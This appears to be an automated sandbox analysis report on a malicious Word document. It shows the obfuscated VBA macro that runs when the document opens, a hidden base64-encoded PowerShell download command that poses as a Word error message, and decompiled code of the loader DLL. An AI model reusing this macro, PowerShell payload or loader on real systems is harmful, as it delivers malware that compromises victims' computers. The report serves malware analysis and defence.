QA]b2[saQB]b2[svAG]b2[s4AU]b2[sABy]b2[sAGU]b2[sAZg]b2[sBlA]b2[sHIA]b2[sZQB]b2[suAG]b2[sMAZ]b2[sQAg]b2[sAD0]b2[sAIA]b2[sAoA]b2[sCcA]b2[sUwA]b2[snAC]b2[ssAK]b2[sAAn]b2[sAGk]b2[sAbA]b2[sBlA]b2[sCcA]b2[sKwA]b2[snAG]b2[s4AJ]b2[swAr]b2[sACc]b2[sAdA]b2[sBsA]b2[sHkA]b2[sJwA]b2[spAC]b2[ssAK]b2[sAAn]b2[sAEM]b2[sAbw]b2[sAnA]b2[sCsA]b2[sJwB]b2[suAC]b2[scAK]b2[sQAr]b2[sACg]b2[sAJw]b2[sB0A]b2[sCcA]b2[sKwA]b2[snAG]b2[skAb]b2[sgB1]b2[sACc]b2[sAKQ]b2[sArA]b2[sCcA]b2[sZQA]b2[snAC]b2[skAO]b2[swAk]b2[sAEE]b2[sAOA]b2[sBoA]b2[sDIA]b2[scgB]b2[s6AG]b2[sIAP]b2[sQAk]b2[sAEY]b2[sANg]b2[sBfA]b2[sEEA]b2[sIAA]b2[srAC]b2[sAAW]b2[swBj]b2[sAGg]b2[sAYQ]b2[sByA]b2[sF0A]b2[sKAA]b2[s2AD]b2[sQAK]b2[sQAg]b2[sACs]b2[sAIA]b2[sAkA]b2[sEwA]b2[sOQA]b2[s4AF]b2[sAAO]b2[swAk]b2[sAE0]b2[sAMA]b2[sAwA]b2[sE8A]b2[sPQA]b2[soAC]b2[scAQ]b2[swAn]b2[sACs]b2[sAKA]b2[sAnA]b2[sDgA]b2[sMgA]b2[snAC]b2[ssAJ]b2[swBa]b2[sACc]b2[sAKQ]b2[sApA]b2[sDsA]b2[sIAA]b2[skAD]b2[sMAV]b2[sgBD]b2[sADo]b2[sAOg]b2[sAiA]b2[sGMA]b2[scgB]b2[slAG]b2[sEAY]b2[sABU]b2[sAGA]b2[sARQ]b2[sBgA]b2[sEQA]b2[sYAB]b2[spAF]b2[sIAZ]b2[sQBj]b2[sAFQ]b2[sAbw]b2[sBSA]b2[sHkA]b2[sIgA]b2[soAC]b2[sQAS]b2[sABP]b2[sAE0]b2[sARQ]b2[sAgA]b2[sCsA]b2[sIAA]b2[soAC]b2[sgAK]b2[sAAn]b2[sAFQ]b2[sAeQ]b2[sBWA]b2[sCcA]b2[sKwA]b2[snAF]b2[sgAd]b2[sAAn]b2[sACs]b2[sAJw]b2[sBzA]b2[sF8A]b2[sbgA]b2[snAC]b2[skAK]b2[swAo]b2[sACc]b2[sAbQ]b2[sBmA]b2[sFQA]b2[seQB]b2[sWAF]b2[sAAN]b2[sAAn]b2[sACs]b2[sAJw]b2[sAxA]b2[sCcA]b2[sKQA]b2[srAC]b2[scAO]b2[sAA4]b2[sACc]b2[sAKw]b2[sAoA]b2[sCcA]b2[scQB]b2[srAC]b2[scAK]b2[swAn]b2[sAFQ]b2[sAJw]b2[sApA]b2[sCsA]b2[sJwB]b2[s5AF]b2[sYAJ]b2[swAp]b2[sACA]b2[sALQ]b2[sByA]b2[sEUA]b2[scAB]b2[ssAG]b2[sEAQ]b2[swBF]b2[sACA]b2[sAIA]b2[sAoA]b2[sCcA]b2[sVAA]b2[snAC]b2[ssAJ]b2[swB5]b2[sAFY]b2[sAJw]b2[sAp,"]b2[s",) -> cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IAAgAHMAZQB0AC0ASQB0AGUAbQAgAHYAYQBSAGkAYQBCAEwARQA6ADMAdgBDACAAIAAoAFsAVAB5AHAARQBdACgAIgB7ADUAfQB7ADAAfQB7ADEAfQB7ADMAfQB7ADIAfQB7ADQAfQAiACAALQBGACcAWQBTAHQAJwAsACcARQBtAC4ASQBvACcALAAnAEkAUgBFAGMAVABPACcALAAnAC4AZAAnACwAJwBSAHkAJwAsACcAUwAnACkAIAAgACkAOwAgACAAIABTAGUAVAAtAEkAVABFAG0AIAAgAFYAYQBSAGkAQQBCAGwARQA6ADUANAA5AGMAIAAgACgAIAAgAFsAdABZAHAAZQBdACgAIgB7ADQAfQB7ADEAfQB7ADAAfQB7ADIAfQB7ADMAfQAiACAALQBGACAAJwAuACcALAAnAHkAcwB0AEUAbQAnACwAJwBOAEUAVAAuAFMARQByAHYAaQBjAGUAUABPAGkAbgAnACwAJwBUAG0AQQBuAEEAZwBFAFIAJwAsACcAUwAnACkAIAApACAAOwAgACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwAnACsAKAAnAGkAbABlACcAKwAnAG4AJwArACcAdABsAHkAJwApACsAKAAnAEMAbwAnACsAJwBuACcAKQArACgAJwB0ACcAKwAnAGkAbgB1ACcAKQArACcAZQAnACkAOwAkAEEAOABoADIAcgB6AGIAPQAkAEYANgBfAEEAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEwAOQA4AFAAOwAkAE0AMAAwAE8APQAoACcAQwAnACsAKAAnADgAMgAnACsAJwBaACcAKQApADsAIAAkADMAVgBDADoAOgAiAGMAcgBlAGEAYABUAGAARQBgAEQAYABpAFIAZQBjAFQAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAFQAeQBWACcAKwAnAFgAdAAnACsAJwBzAF8AbgAnACkAKwAoACcAbQBmAFQAeQBWAFAANAAnACsAJwAxACcAKQArACcAOAA4ACcAKwAoACcAcQBrACcAKwAnAFQAJwApACsAJwB5AFYAJwApACAALQByAEUAcABsAGEAQwBFACAAIAAoACcAVAAnACsAJwB5AFYAJwApACwAWwBDAEgAYQByAF0AOQAyACkAKQA7ACQAQwA0ADIATgA9ACgAKAAnAEMAJwArACcAMQAzACcAKQArACcARAAnACkAOwAgACAAKAAgAGwAUwAgACAAVgBBAFIAaQBBAGIATABlADoANQA0ADkAQwAgACkALgB2AGEATAB1AEUAOgA6ACIAcwBFAGMAVQBgAFIAYABpAFQAeQBwAFIAbwB0AGAAbwBgAGMATwBsACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABEADcANwBZAD0AKAAnAFoAOAAnACsAJwBfAFYAJwApADsAJABXAHYANgB4AGIANQA3ACAAPQAgACgAKAAnAFUAOQAnACsAJwA1ACcAKQArACcARAAnACkAOwAkAEgAMAAxAFYAPQAoACgAJwBHADkAJwArACcANgAnACkAKwAnAEgAJwApADsAJABUAHoAbwA3AHQAdwBsAD0AJABIAE8ATQBFACsAKAAoACcASgBqACcAKwAnAFcAJwArACgAJwBYAHQAJwArACcAcwBfAG4AbQAnACsAJwBmAEoAagBXAFAANAAnACsAJwAxADgAJwApACsAJwA4ACcAKwAoACcAcQAnACsAJwBrAEoAJwApACsAJwBqACcAKwAnAFcAJwApAC0AYwBSAGUAUABsAGEAQwBFACAAKAAnAEoAagAnACsAJwBXACcAKQAsAFsAQwBIAEEAUgBdADkAMgApACsAJABXAHYANgB4AGIANQA3ACsAKAAnAC4AJwArACgAJwBkACcAKwAnAGwAbAAnACkAKQA7ACQAWAA1ADYAUAA9ACgAJwBMACcAKwAoACcANgA3ACcAKwAnAFEAJwApACkAOwAkAFcAdABfADUAdwBrAGMAPQAoACcAXQBiACcAKwAoACcAMgBbAHMAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvACcAKwAnAGYAbQBjAGEAJwApACsAJwB2AC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACgAJwBpAG0AYQAnACsAJwBnAGUAcwAnACkAKwAnAC8ANwAnACsAKAAnAEYAVgA0AE4AJwArACcAZAAnACsAJwAvAEAAXQBiADIAWwBzACcAKQArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAoACcAdABoAGUAcAByACcAKwAnAGEAJwApACsAKAAnAGoAaQAnACsAJwBuACcAKQArACgAJwBzAGgAJwArACcAZQBlAC4AJwApACsAKAAnAGMAJwArACcAbwBtAC8AbwB0ACcAKQArACgAJwBoACcAKwAnAGUAJwArACcAcgBmACcAKwAnAGkAbABlAHMAJwArACcALwB3AEEARgBQAC8AJwApACsAJwBAAF0AJwArACgAJwBiADIAWwBzADoAJwArACcALwAnACsAJwAvACcAKwAnAHcAdwB3AC4AcgBlAG0AbwB2ACcAKwAnAGUAcAAnACkAKwAoACcAYwB0AHIAJwArACcAbwAnACkAKwAnAGoAYQAnACsAKAAnAG4AJwArACcALgBjACcAKQArACgAJwBvAG0ALwB3ACcAKwAnAHAAJwApACsAKAAnAC0AJwArACcAYQBkAG0AJwApACsAJwBpAG4AJwArACcALwAnACsAKAAnAGEAawAnACsAJwAwACcAKQArACcAYwAnACsAJwBoACcAKwAoACcASAAnACsAJwAvAEAAJwArACcAXQBiADIAJwApACsAKAAnAFsAcwAnACsAJwA6ACcAKQArACgAJwAvAC8AdwAnACsAJwB3AHcALgAnACkAKwAnAGcAJwArACgAJwBlACcAKwAnAG8AcwByACcAKQArACcAdAAuACcAKwAoACcAYwAnACsAJwBvAG0AJwApACsAKAAnAC8AYQBxAHEAJwArACcAaAAnACkAKwAoACcAdwAnACsAJwBkAGEAcAAnACkAKwAoACcALwBsACcAKwAnADAALwBAACcAKwAnAF0AYgAyAFsAcwA6ACcAKQArACcALwAvACcAKwAnAGcAZQAnACsAJwBvACcAKwAnAGYAJwArACcAZgAnACsAJwBvAGcAJwArACgAJwBsACcAKwAnAGUAbQB1AHMAaQAnACsAJwBjAC4AJwApACsAJwBjACcAKwAoACcAbwAnACsAJwBtAC8AdwBwACcAKQArACgAJwAtACcAKwAnAGEAZAAnACkAKwAoACcAbQBpACcAKwAnAG4ALwAnACkAKwAoACcANwAnACsAJwBDADEAJwApACsAJwAxACcAKwAoACcAbwAnACsAJwBBAEMALwBAACcAKQArACgAJwBdAGIAJwArACcAMgBbAHMAJwApACsAKAAnADoAJwArACcALwAvACcAKQArACcAdwB3ACcAKwAoACcAdwAnACsAJwAuAGEAYwBoAHUAdABhACcAKwAnAG0AJwArACcAYQBuACcAKQArACcAYQBzACcAKwAoACcAYQAuACcAKwAnAGMAJwApACsAKAAnAG8AbQAnACsAJwAvAGcAJwApACsAJwBhAHIAJwArACcAbQBpACcAKwAnAG4AJwArACcALQAnACsAKAAnAHAAJwArACcAcgBvAC0AZgAnACkAKwAoACcAZQAnACsAJwBpADgAbwAvACcAKQArACgAJwBtAFcAJwArACcALwAnACkAKwAo
Yll3shw1598y8rt_cn
FreeFile
Open
Open
LOF
intGend

Strings	Decrypted Strings
"F:\LVTgJDEAH\npDRFjHAI\sJWnCICW.fUhjC"
"O:\RfnuCBKG\RjeSEoI\GLSpIJCI.ANupdJL"
"]b2[s"
"F:\XuogCJjvl\BqVwVOI\aWwKBeC.QabEyMDF"
"O:\eFmrAZDJ\nodmnAAxD\xMUzkGzO.sFkRlmCCY"

Line	Instruction	Meta Information
214	Function Syv_ghviw_8l22(Njuqt916644ev0c_cr)
215	Qyqz1cvtrsxfqjyol = Zzf8ou_itu4vukq	Zzf8ou_itu4vukq executed
216	Goto sbKLC
217	Dim bUpzhB() as Byte
218	Dim bqPAAAGJF as Integer
219	bqPAAAGJF = FreeFile	FreeFile
220	Open "F:\LVTgJDEAH\npDRFjHAI\sJWnCICW.fUhjC" For Binary Access Read As # bqPAAAGJF	Open
221	Open "O:\RfnuCBKG\RjeSEoI\GLSpIJCI.ANupdJL" For Binary Access Read As # bqPAAAGJF	Open
222	Redim bUpzhB(1 To LOF(intGend) - 5)	LOF intGend
223	Get # bqPAAAGJF, , bUpzhB
224	Get # bqPAAAGJF, , bUpzhB
225	Get # bqPAAAGJF, , bUpzhB
226	Close # bqPAAAGJF
226	sbKLC:
228	Syv_ghviw_8l22 = Replace(Njuqt916644ev0c_cr, "]b2[s", Yll3shw1598y8rt_cn)	Replace("w]b2[sin]b2[sm]b2[sgm]b2[st]b2[s]b2[s]b2[ss]b2[s]b2[s:w]b2[s]b2[sin]b2[s3]b2[s2]b2[s_]b2[s]b2[sp]b2[s]b2[sro]b2[s]b2[sce]b2[ss]b2[ss]b2[s]b2[s","]b2[s",) -> winmgmts:win32_process Yll3shw1598y8rt_cn executed
229	Goto ZYftoBlCA
230	Dim ARnfVzJ() as Byte
231	Dim TXAJH as Integer
232	TXAJH = FreeFile	FreeFile
233	Open "F:\XuogCJjvl\BqVwVOI\aWwKBeC.QabEyMDF" For Binary Access Read As # TXAJH	Open
234	Open "O:\eFmrAZDJ\nodmnAAxD\xMUzkGzO.sFkRlmCCY" For Binary Access Read As # TXAJH	Open
235	Redim ARnfVzJ(1 To LOF(intGend) - 5)	LOF intGend
236	Get # TXAJH, , ARnfVzJ
237	Get # TXAJH, , ARnfVzJ
238	Get # TXAJH, , ARnfVzJ
239	Close # TXAJH
239	ZYftoBlCA:
241	End Function

Module: Mlimulsud7q0

Declaration

Line	Content
1	Attribute VB_Name = "Mlimulsud7q0"

Module: Sjtq5nhmztw

Declaration

Line	Content
1	Attribute VB_Name = "Sjtq5nhmztw"
2	Attribute VB_Base = "1Normal.ThisDocument"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = True
8	Attribute VB_Customizable = True

Executed Functions

Subroutine Document_open, APIs: 67, Strings: 0, Number of lines: 3, Relevance: 102.003

APIs	Meta Information
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: Item
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: FreeFile
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: Open
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: Open
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: LOF
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: intGend
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: FreeFile
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: Open
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: Open
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: LOF
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: intGend
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: FreeFile
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: Open
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: Open
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: LOF
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: intGend
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: FreeFile
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: Open
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: Open
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: LOF
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: intGend
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: FreeFile
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: Open
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: Open
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: LOF
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: intGend
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: FreeFile
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: Open
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: Open
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: LOF
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: intGend
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: FreeFile
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: Open
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: Open
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: LOF
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: intGend
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: CreateObject
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: FreeFile
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: Open
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: Open
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: LOF
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: intGend
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: Mid
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: Len
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: FreeFile
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: Open
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: Open
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: LOF
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: intGend
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: FreeFile
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: Open
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: Open
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: LOF
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: intGend
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: Create
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: Ykqhx9otvrqd8hk
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: K6e5kz9g40vnyyqph
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: FreeFile
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: Open
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: Open
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: LOF
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: intGend
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: FreeFile
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: Open
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: Open
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: LOF
Part of subcall function Z9zoxbjstfyh_817c@Ifll4vsaspsrsln6_: intGend

Line	Instruction	Meta Information
9	Private Sub Document_open()
10	Z9zoxbjstfyh_817c	executed
11	End Sub

Reset < >

Analysis Process: powershell.exe PID: 1628 Parent PID: 2384 powershell.exeCOMMON

Executed Functions

Function 000007FF00262120, Relevance: .5, Instructions: 540COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2093345790.000007FF00260000.00000040.00000001.sdmp, Offset: 000007FF00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff00260000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94e2fb16a2bb4d9468101eb1459e5321645c115d538c91c2116d73cf252cc29a
Instruction ID: 306b0555641b4336f9d1c4958e9f4806cbb65e0fedb48dd59784548fba2cf302
Opcode Fuzzy Hash: 94e2fb16a2bb4d9468101eb1459e5321645c115d538c91c2116d73cf252cc29a
Instruction Fuzzy Hash: A8C1CD61A0EBC64FE743573458657A17FF0EF17210F1A00EBE489CB1A3EA489D5AC362

Uniqueness

Uniqueness Score: -1.00%

Function 000007FF00260789, Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2093345790.000007FF00260000.00000040.00000001.sdmp, Offset: 000007FF00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff00260000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00e60955cf503fcc03a3259491fab82d2214263edc005499713533e38603d0f0
Instruction ID: 275cee4e687498d7792b6403df51cb21e3f78f7925c174fd0be8dc443cacdcf1
Opcode Fuzzy Hash: 00e60955cf503fcc03a3259491fab82d2214263edc005499713533e38603d0f0
Instruction Fuzzy Hash: A631EF9594FBC20FD743933858A86A17FB0AF13204B5E01EBD0C4CF0B3E959899AD362

Uniqueness

Uniqueness Score: -1.00%

Function 000007FF002623C5, Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2093345790.000007FF00260000.00000040.00000001.sdmp, Offset: 000007FF00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff00260000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0af5fcec9b047b8fda591bc6f92e70cfdc051058cc84b7e51d38395c10396390
Instruction ID: b11632b214951f06ed3e99c587924e5b270b5896b6da12a799e41f631337109a
Opcode Fuzzy Hash: 0af5fcec9b047b8fda591bc6f92e70cfdc051058cc84b7e51d38395c10396390
Instruction Fuzzy Hash: 90318151A1EFC64FE757533868653B07FA0EF17205B4A00E7E488CB1A3ED589D598362

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2296 Parent PID: 2468 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	4.8%
Dynamic/Decrypted Code Coverage:	31.1%
Signature Coverage:	22.2%
Total number of Nodes:	668
Total number of Limit Nodes:	43

Executed Functions

Function 10001E91, Relevance: 203.4, APIs: 110, Strings: 6, Instructions: 425
libraryloadermemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E10001E91(void* __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				char _v21;
				struct HWND__* _v28;
				char _v32;
				char _v36;
				char _v40;
				void* __ebp;
				signed int _t22;
				struct HINSTANCE__* _t24;
				int _t25;
				CHAR* _t29;
				void* _t33;
				void* _t35;
				int _t136;
				void* _t137;
				signed int _t138;
				signed int _t139;
				void* _t140;
				void* _t146;
				intOrPtr* _t147;
				void* _t153;
				void* _t156;
				void* _t157;
				void* _t159;
				void* _t162;
				struct HINSTANCE__* _t163;
				signed int _t173;

				_t162 = __edx;
				_t153 = __ecx;
				_t22 =  *0x1004d054; // 0x944e5696
				_v8 = _t22 ^ _t173;
				_t24 = LoadLibraryA("MFC42.DLL"); // executed
				if(_t24 == 0) {
					L5:
					_t25 = 0;
					__eflags = 0;
				} else {
					_v20 = 0x17;
					_v36 = 0;
					_v28 = 0;
					_v16 = 0x1e55;
					_v12 = 0x409;
					_t163 = LoadLibraryA("ntdll.dll");
					_t29 = E10001A7D("LdrFindResource_U", E1000E3D0("LdrFindResource_U")); // executed
					 *0x1004db58 = GetProcAddress(_t163, _t29);
					 *0x1004db5c = GetProcAddress(_t163, "LdrAccessResource");
					_push( &_v40);
					_t33 = E1000FEF7(_t153, "3");
					_pop(_t156);
					_t35 =  *0x1004db58(0x10000000,  &_v20, _t33);
					ShowWindow(0, 0); // executed
					ShowWindow(0, 0); // executed
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					ShowWindow(0, 0);
					if(_t35 >= 0) {
						 *0x1004db5c(0x10000000, _v40,  &_v36,  &_v28);
					}
					_t136 = WriteFileGather(0, 0, 0, 0, 0);
					_t179 = _t136;
					if(_t136 != 0) {
						goto L5;
					} else {
						_t137 = E1000FEF7(_t156, L"64");
						_pop(_t157);
						_t138 = E1000FEF7(_t157, L"64");
						_t139 = E1000FEF7(_t157, L"64");
						_t159 = _t137;
						_t140 = VirtualAlloc(0, _v28, _t138 * _t139, ??); // executed
						E100045C0(_t140, _v36, _v28);
						E10001D16(_t159, _t179, "k1>@dY0V<o)afFNz7v68r^Kn6)h)OGcSc", 0x22,  &_v32);
						E10001D9A(_t140, _v28,  &_v32);
						_t146 = E10002838(_t140, _v28); // executed
						_t147 = E10002765( &_v21, _t146, "Control_RunDLL"); // executed
						 *_t147(); // executed
						_t25 = MessageBoxA(0,  *0x1004d024, 0, 0);
					}
				}
				return E100037EA(_t25, _v8 ^ _t173, _t162);
			}

0x10001e91
0x10001e91
0x10001e97
0x10001e9e
0x10001eaf
0x10001eb3
0x1000217a
0x1000217a
0x1000217a
0x10001eb9
0x10001ebb
0x10001ec7
0x10001eca
0x10001ecd
0x10001ed4
0x10001ee2
0x10001eec
0x10001f04
0x10001f0b
0x10001f13
0x10001f19
0x10001f1e
0x10001f29
0x10001f39
0x10001f3d
0x10001f41
0x10001f45
0x10001f49
0x10001f4d
0x10001f51
0x10001f55
0x10001f59
0x10001f5d
0x10001f61
0x10001f65
0x10001f69
0x10001f6d
0x10001f71
0x10001f75
0x10001f79
0x10001f7d
0x10001f81
0x10001f85
0x10001f89
0x10001f8d
0x10001f91
0x10001f95
0x10001f99
0x10001f9d
0x10001fa1
0x10001fa5
0x10001fa9
0x10001fad
0x10001fb1
0x10001fb5
0x10001fb9
0x10001fbd
0x10001fc1
0x10001fc5
0x10001fc9
0x10001fcd
0x10001fd1
0x10001fd5
0x10001fd9
0x10001fdd
0x10001fe1
0x10001fe5
0x10001fe9
0x10001fed
0x10001ff1
0x10001ff5
0x10001ff9
0x10001ffd
0x10002001
0x10002005
0x10002009
0x1000200d
0x10002011
0x10002015
0x10002019
0x1000201d
0x10002021
0x10002025
0x10002029
0x1000202d
0x10002031
0x10002035
0x10002039
0x1000203d
0x10002041
0x10002045
0x10002049
0x1000204d
0x10002051
0x10002055
0x10002059
0x1000205d
0x10002061
0x10002065
0x10002069
0x1000206d
0x10002071
0x10002075
0x10002079
0x1000207d
0x10002081
0x10002085
0x10002089
0x1000208d
0x10002091
0x10002095
0x10002099
0x1000209d
0x100020a1
0x100020a5
0x100020a9
0x100020ad
0x100020b1
0x100020b5
0x100020b9
0x100020bd
0x100020c1
0x100020c5
0x100020c9
0x100020db
0x100020db
0x100020e6
0x100020ec
0x100020ee
0x00000000
0x100020f4
0x100020fa
0x100020ff
0x10002102
0x1000210a
0x10002113
0x10002119
0x10002128
0x10002138
0x10002145
0x10002154
0x10002162
0x10002167
0x10002172
0x10002172
0x100020ee
0x1000218a

APIs

LoadLibraryA.KERNEL32(MFC42.DLL), ref: 10001EAF
LoadLibraryA.KERNEL32(ntdll.dll), ref: 10001EDB
_strlen.LIBCMT ref: 10001EE5

